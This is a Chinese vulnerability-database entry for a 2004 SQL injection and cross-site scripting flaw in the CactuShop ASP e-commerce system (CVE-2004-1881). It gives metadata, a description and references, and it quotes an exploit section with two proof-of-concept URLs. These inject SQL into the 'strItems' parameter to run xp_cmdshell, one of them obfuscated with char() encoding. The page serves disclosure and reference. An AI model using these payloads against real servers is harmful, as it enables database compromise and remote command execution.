Cactusoft CactuShop SQL远程注入漏洞

17次阅读
没有评论

Cactusoft CactuShop SQL远程注入漏洞

漏洞ID 1107843 漏洞类型 输入验证
发布时间 2004-03-31 更新时间 2005-10-20
Cactusoft CactuShop SQL远程注入漏洞CVE编号 CVE-2004-1881
Cactusoft CactuShop SQL远程注入漏洞CNNVD-ID CNNVD-200412-487
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23898
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-487
|漏洞详情
CactuShop是一款基于ASP的电子商务系统。CactuShop不充分过滤用户提交的URI参数,远程攻击者可以利用这个漏洞进行SQL注入攻击,可获得敏感信息或更改数据库。’mailorder.asp’和’payonline.asp’脚本对用户提供给’strItems’参数的数据,在用户SQL查询时缺少充分过滤,提交包含恶意SQL命令数据给’strItems’参数,可更改原有数据库逻辑,获得敏感信息或更改数据库。另外’largeimage.asp’脚本存在跨站脚本执行问题,可获得用户会话ID及访问用户个人数据。
|漏洞EXP
source: http://www.securityfocus.com/bid/10019/info

Reportedly CactuShop is prone to a remote SQL injection vulnerability. This issue is due to a failure to properly sanitize user-supplied URI input before using it to craft an SQL query.

As a result of this, a malicious user may influence database queries in order to view or modify sensitive information, potentially compromising the software or the database. It may be possible for an attacker to disclose the administrator password hash by exploiting this issue. 

http://www.example.com/payonline.asp/[email protected]&CD_Password=&CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&numCurrencyID=1&numItemCount=2&strItems=214;+exec+master..xp_cmdshell+'dir+c:'--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed

http://www.example.com/payonline.asp/strAgain=yes&[email protected]&CD_Password=&CD_AffiliateID=&CD_CardholderCountry=200&CD_ShippingCountry=200&CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1&numCurrencyID=1&numItemCount=2&strItems=214;declare%20@a%20sysname%20set%20@a%20=%20char(100)%2bchar(105)%2bchar(114)%2bchar(32)%2bchar(99)%2bchar(58)%20exec%20master..xp_cmdshell%20@a;--z165z&strQuantities=6z2z&numShipMethod=1&btnProceed=Proceed
|参考资料

来源:SECUNIA
名称:11272
链接:http://secunia.com/advisories/11272
来源:XF
名称:cactushop-multiple-sql-injection(15686)
链接:http://xforce.iss.net/xforce/xfdb/15686
来源:BID
名称:10019
链接:http://www.securityfocus.com/bid/10019
来源:www.s-quadra.com
链接:http://www.s-quadra.com/advisories/Adv-20040331.txt
来源:OSVDB
名称:4786
链接:http://www.osvdb.org/4786
来源:OSVDB
名称:4785
链接:http://www.osvdb.org/4785
来源:SECTRACK
名称:1009601
链接:http://securitytracker.com/id?1009601
来源:BUGTRAQ
名称:20040331CactuSoftCactuShopv5.xshoppingcartsoftwaremultiplesecurity
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108075059013762&w;=2
来源:NSFOCUS
名称:6262
链接:http://www.nsfocus.net/vulndb/6262

相关推荐: Davin McCall dlogin Buffer Overflow Vulnerability

Davin McCall dlogin Buffer Overflow Vulnerability 漏洞ID 1102517 漏洞类型 Boundary Condition Error 发布时间 2002-02-05 更新时间 2002-02-05 CVE编号…

正文完
 0